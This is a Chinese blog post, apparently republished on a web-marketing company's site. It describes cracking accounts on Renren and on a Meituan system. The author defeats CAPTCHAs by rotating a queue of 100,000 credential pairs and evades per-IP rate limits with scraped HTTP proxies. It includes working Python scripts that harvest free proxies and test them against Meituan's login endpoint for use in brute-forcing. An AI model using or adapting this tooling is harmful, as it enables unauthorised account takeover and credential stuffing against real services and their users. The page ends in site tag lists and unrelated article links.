全网整合营销服务商

电脑端+手机端+微信端=数据同步管理

免费咨询热线:400-708-3566

批量获取及验证HTTP代理的Python脚本

1. 在扫号人人网时,我遇到单个账号错误两次,强制要求输入验证码,而对方并未实施IP策略。

我采用维护10万(用户名,密码) 队列的方式来绕过验证码。具体的做法是,当某个用户名、密码组合遇到需要验证码,就把该破解序列挂起,放到队列尾部等待下次测试,继续破解其他账号密码。

这样就可以保证2/3的时间都在进行正常破解和扫号。

2. 在破解美团网某系统账号时,我遇到了单个IP访问有一定限制,请求频率不可过快。于是我挂了72个 HTTP代理来解决这个问题。 看似每个IP的请求都正常,但其实从整个程序上看,效率还是挺可观的。

本篇我发出自己抓HTTP的脚本片段,其实只有几行。匿名代理是从这里抓取的:http://www.xici.net.co/nn/

首先获取代理列表 :

from bs4 import BeautifulSoup
import urllib2


of = open('proxy.txt' , 'w')

for page in range(1, 160):
  html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page) ).read()
  soup = BeautifulSoup(html_doc)
  trs = soup.find('table', id='ip_list').find_all('tr')
  for tr in trs[1:]:
    tds = tr.find_all('td')
    ip = tds[1].text.strip()
    port = tds[2].text.strip()
    protocol = tds[5].text.strip()
    if protocol == 'HTTP' or protocol == 'HTTPS':
      of.write('%s=%s:%s\n' % (protocol, ip, port) )
      print '%s=%s:%s' % (protocol, ip, port)

of.close()

接着验证代理是否可用,因为我是用于破解美团网系统的账号,因此用了美团的页面标记:

#encoding=gbk
import httplib
import time
import urllib
import threading

inFile = open('proxy.txt', 'r')
outFile = open('available.txt', 'w')

lock = threading.Lock()

def test():
  while True:
    lock.acquire()
    line = inFile.readline().strip()
    lock.release()
    if len(line) == 0: break
    protocol, proxy = line.split('=')
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
      'Cookie': ''}
    try:
      conn = httplib.HTTPConnection(proxy, timeout=3.0)
      conn.request(method='POST', url='http://e.meituan.com/m/account/login', body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1', headers=headers )
      res = conn.getresponse()
      ret_headers = str( res.getheaders() ) 
      html_doc = res.read().decode('utf-8')
      print html_doc.encode('gbk')
      if ret_headers.find(u'/m/account/login/') > 0:
        lock.acquire()
        print 'add proxy', proxy
        outFile.write(proxy + '\n')
        lock.release()
      else:
        print '.',
    except Exception, e:
      print e

all_thread = []
for i in range(50):
  t = threading.Thread(target=test)
  all_thread.append(t)
  t.start()
  
for t in all_thread:
  t.join()

inFile.close()
outFile.close()


# 验证 HTTP代理 Python脚本  # Python程序中设置HTTP代理  # Python3.4实现从HTTP代理网站批量获取代理并筛选的方法示例  # Python request设置HTTPS代理代码解析  # 对python使用http、https代理的实例讲解  # Python代码实现http/https代理服务器的脚本  # python爬虫http代理使用方法  # Python异步爬虫requests和aiohttp中代理IP的使用  # python使用aiohttp通过设置代理爬取基金数据简单示例  # 解决python异步框架aiohttp无法使用本地代理问题  # python做http代理请求的项目实践  # 验证码  # 我是  # 都在  # 两次  # 有一定  # 是从  # 用了  # 上看  # 挂了  # 过快  # 解决这个问题  # 就可以  # 挂起  # 把该  # 几行  # 下次  # find  # trs  # table  # find_all 


相关文章: 如何在阿里云虚拟主机上快速搭建个人网站?  ,购物网站怎么盈利呢?  平台云上自主建站:模板化设计与智能工具打造高效网站  高防服务器如何保障网站安全无虞?  如何选择域名并搭建高效网站?  如何在云服务器上快速搭建个人网站?  学校为何禁止电信移动建设网站?  如何快速生成专业多端适配建站电话?  网页设计与网站制作内容,怎样注册网站?  无锡制作网站公司有哪些,无锡优八网络科技有限公司介绍?  建站之星安装后如何自定义网站颜色与字体?  个人网站制作流程图片大全,个人网站如何注销?  企业在线网站设计制作流程,想建设一个属于自己的企业网站,该如何去做?  上海网站制作开发公司,上海买房比较好的网站有哪些?  网站制作服务平台,有什么网站可以发布本地服务信息?  重庆网站制作公司哪家好,重庆中考招生办官方网站?  怎么制作网站设计模板图片,有电商商品详情页面的免费模板素材网站推荐吗?  如何快速搭建自助建站会员专属系统?  湖南网站制作公司,湖南上善若水科技有限公司做什么的?  如何在建站主机中优化服务器配置?  电商网站制作价格怎么算,网上拍卖流程以及规则?  建站之星代理如何优化在线客服效率?  官网网站制作腾讯审核要多久,联想路由器newifi官网  手机怎么制作网站教程步骤,手机怎么做自己的网页链接?  三星网站视频制作教程下载,三星w23网页如何全屏?  网站制作和推广的区别,想自己建立一个网站做推广,有什么快捷方法马上做好一个网站?  上海制作企业网站有哪些,上海有哪些网站可以让企业免费发布招聘信息?  大连 网站制作,大连天途有线官网?  如何快速登录WAP自助建站平台?  如何快速使用云服务器搭建个人网站?  建站之星如何开启自定义404页面避免用户流失?  TestNG的testng.xml配置文件怎么写  如何在IIS7上新建站点并设置安全权限?  如何用好域名打造高点击率的自主建站?  大连网站设计制作招聘信息,大连投诉网站有哪些?  如何将凡科建站内容保存为本地文件?  宁波自助建站系统如何快速打造专业企业网站?  Bpmn 2.0的XML文件怎么画流程图  如何通过网站建站时间优化SEO与用户体验?  成都品牌网站制作公司,成都营业执照年报网上怎么办理?  如何高效完成独享虚拟主机建站?  Android自定义listview布局实现上拉加载下拉刷新功能  C#怎么使用委托和事件 C# delegate与event编程方法  如何快速生成可下载的建站源码工具?  建站主机选购指南与交易推荐:核心配置解析  公司网站的制作公司,企业网站制作基本流程有哪些?  北京专业网站制作设计师招聘,北京白云观官方网站?  如何制作一个表白网站视频,关于勇敢表白的小标题?  建站之星会员如何解锁更多建站功能?  如何在云指建站中生成FTP站点? 

您的项目需求

*请认真填写需求信息,我们会在24小时内与您取得联系。